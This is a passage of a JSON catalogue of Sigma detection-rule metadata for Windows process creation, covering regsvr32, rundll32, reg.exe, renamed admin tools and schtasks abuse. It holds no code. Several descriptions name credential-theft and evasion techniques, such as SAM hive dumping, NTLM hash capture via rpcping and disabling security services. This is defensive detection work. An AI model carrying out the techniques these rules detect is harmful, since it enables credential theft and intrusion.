"car.2019-04-002", - "car.2019-04-003" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_regsvr32_anomalies.yml", - "author": "Florian Roth, oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", - "value": "Regsvr32 Flags Anomaly", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2019/07/13", - "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", - "value": "Suspicious Regsvr32 HTTP IP Pattern", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", - "https://twitter.com/tccontre18/status/1480950986650832903", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "FQDNs that start with a number" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files", - "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", - "value": "Suspicious Regsvr32 Execution With Image Extension", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2021/11/29", - "filename": "proc_creation_win_susp_regsvr32_image.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "uuid": "50919691-7302-437f-8e10-1fe088afa145", - "value": "Regsvr32 Command Line Without DLL", - "meta": { - "refs": [ - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" - ], - "creation_date": "2019/07/17", - "filename": "proc_creation_win_susp_regsvr32_no_dll.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", - "value": "Suspicious Regsvr32 Execution From Remote Share", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2022/10/31", - "filename": "proc_creation_win_susp_regsvr32_remote_share.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "value": "Regsvr32 Spawning Explorer", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-april-2022/", - "https://www.echotrail.io/insights/search/regsvr32.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2022/05/05", - "filename": "proc_creation_win_susp_regsvr32_spawn_explorer.yml", - "author": "elhoim", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "value": "Reg Add Suspicious Paths", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_susp_reg_add.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare legitimate add to registry via cli (to these locations)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", - "value": "Suspicious Reg Add BitLocker", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2021/11/15", - "filename": "proc_creation_win_susp_reg_bitlocker.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", - "value": "Reg Disable Security Service", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/1415295021041979392", - "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", - "https://vms.drweb.fr/virus/?i=24144899", - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/14", - "filename": "proc_creation_win_susp_reg_disable_sec_services.yml", - "author": "Florian Roth, John Lambert (idea), elhoim", - "level": "high", - "falsepositive": [ - "Unknown", - "Other security solution installers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", - "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", - "value": "Suspicious Reg Add Open Command", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_susp_reg_open_command.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "value": "Renamed AdFind Detection", - "meta": { - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" - ], - "creation_date": "2022/08/21", - "filename": "proc_creation_win_susp_renamed_adfind.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "uuid": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - "value": "Renamed CreateDump Process Dump", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://twitter.com/bopin2020/status/1366400799199272960", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/09/20", - "filename": "proc_creation_win_susp_renamed_createdump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Command lines that use the same flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "value": "Renamed ZOHO Dctask64", - "meta": { - "refs": [ - "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", - "https://twitter.com/gN3mes1s/status/1222095371175911424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" - ], - "creation_date": "2020/01/28", - "filename": "proc_creation_win_susp_renamed_dctask64.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown yet" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious renamed SysInternals DebugView execution", - "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", - "value": "Renamed SysInternals Debug View", - "meta": { - "refs": [ - "https://www.epicturla.com/blog/sysinturla", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2020/05/28", - "filename": "proc_creation_win_susp_renamed_debugview.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "value": "Renamed PAExec", - "meta": { - "refs": [ - "https://www.poweradmin.com/paexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/05/22", - "filename": "proc_creation_win_susp_renamed_paexec.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", - "value": "Capture Credentials with Rpcping.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", - "https://twitter.com/vysecurity/status/974806438316072960", - "https://twitter.com/vysecurity/status/873181705024266241", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_susp_rpcping.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rundll32 based on arguments", - "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "value": "Suspicious Rundll32 Activity", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", - "https://twitter.com/Hexacorn/status/885258886428725250", - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", - "https://twitter.com/nas_bench/status/1433344116071583746", - "https://twitter.com/eral4m/status/1479106975967240209", - "https://twitter.com/eral4m/status/1479080793003671557", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_rundll32_activity.yml", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "value": "Suspicious Call by Ordinal", - "meta": { - "refs": [ - "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", - "https://github.com/Neo23x0/DLLRunner", - "https://twitter.com/cyb3rops/status/1186631731543236608", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", - "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", - "value": "Suspicious Rundll32 Invoking Inline VBScript", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2021/03/05", - "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", - "value": "Rundll32 JS RunHTMLApplication Pattern", - "meta": { - "refs": [ - "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/01/14", - "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", - "value": "Suspicious Key Manager Access", - "meta": { - "refs": [ - "https://twitter.com/NinjaParanoid/status/1516442028963659777", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], - "creation_date": "2022/04/21", - "filename": "proc_creation_win_susp_rundll32_keymgr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", - "value": "Suspicious Rundll32 Without Any CommandLine Params", - "meta": { - "refs": [ - "https://www.cobaltstrike.com/help-opsec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/05/27", - "filename": "proc_creation_win_susp_rundll32_no_params.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Possible but rare" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rundll32 based on arguments", - "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "value": "Suspicious Rundll32 Script in CommandLine", - "meta": { - "refs": [ - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2021/12/04", - "filename": "proc_creation_win_susp_rundll32_script_run.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", - "value": "Suspicious Rundll32 Setupapi.dll Activity", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", - "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", - "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", - "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml", - "author": "Konstantin Grishchenko, oscd.community", - "level": "medium", - "falsepositive": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", - "value": "RunDLL32 Spawning Explorer", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2022/04/27", - "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml", - "author": "elhoim, CD_ROM_", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "value": "Suspicious Rundll32 Activity Invoking Sys File", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2021/03/05", - "filename": "proc_creation_win_susp_rundll32_sys.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", - "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", - "value": "Suspicious Workstation Locking via Rundll32", - "meta": { - "refs": [ - "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/06/04", - "filename": "proc_creation_win_susp_rundll32_user32_dll.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects the execution of Run Once task as configured in the registry", - "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", - "value": "Run Once Task Execution as Configured in Registry", - "meta": { - "refs": [ - "https://twitter.com/pabraeken/status/990717080805789697", - "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_susp_runonce_execution.yml", - "author": "Avneet Singh @v3t0_, oscd.community", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", - "value": "Suspicious Runscripthelper.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_susp_runscripthelper.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process run from unusual locations", - "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", - "value": "Suspicious Process Start Locations", - "meta": { - "refs": [ - "https://car.mitre.org/wiki/CAR-2013-05-002", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_run_locations.yml", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')", - "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", - "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/19", - "filename": "proc_creation_win_susp_rurat_exec_location.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "value": "Suspicious Modification Of Scheduled Tasks", - "meta": { - "refs": [ - "Internal Research", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/07/28", - "filename": "proc_creation_win_susp_schtasks_change.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities", - "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", - "value": "Delete Important Scheduled Task", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_susp_schtasks_delete.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "value": "Delete All Scheduled Tasks", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_susp_schtasks_delete_all.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities", - "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "value": "Disable Important Scheduled Task", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2021/12/26", - "filename": "proc_creation_win_susp_schtasks_disable.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "uuid": "81325ce1-be01-4250-944f-b4789644556f", - "value": "Suspicious Schtasks From Env Var Folder", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", - "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", - 